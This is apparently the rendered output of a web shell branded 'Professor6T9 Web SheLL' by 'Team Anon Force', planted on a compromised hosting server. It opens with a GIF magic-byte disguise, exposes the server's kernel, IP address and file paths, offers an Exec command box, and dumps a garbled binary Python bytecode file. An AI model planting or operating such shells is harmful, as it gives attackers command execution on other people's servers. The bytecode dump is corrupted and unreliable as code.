GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
hc_python
/
lib64
/
python3.12
/
site-packages
/
prometheus_client
/
__pycache__
[ HOME ]
Exec
Submit
gc_collector.cpython-312.pyc
� ���g� � �h � d dl Z d dlZd dlmZ ddlmZmZ ddlmZm Z m Z G d� de� Z e� Zy)� N)�Iterable� )�CounterMetricFamily�Metric)� Collector�CollectorRegistry�REGISTRYc �2 � e Zd ZdZefdefd�Zdee fd�Z y)�GCCollectorz,Collector for Garbage collection statistics.�registryc �v � t t d� rt j � dk7 ry |j | � y )N� get_stats�CPython)�hasattr�gc�platform�python_implementation�register)�selfr s �M/opt/hc_python/lib/python3.12/site-packages/prometheus_client/gc_collector.py�__init__zGCCollector.__init__ s- � ��r�;�'�8�+I�+I�+K�y�+X�����$�� �returnc �P � t dddg�� }t dddg�� }t dddg�� }t t j � � D ]U \ }}t |� }|j |g|d � � |j |g|d � � |j |g|d � � �W |||gS ) N�python_gc_objects_collectedzObjects collected during gc� generation)�labels�python_gc_objects_uncollectablez%Uncollectable objects found during GC�python_gc_collectionsz-Number of times this generation was collected� collected)�value� uncollectable�collections)r � enumerater r �str� add_metric)r r r"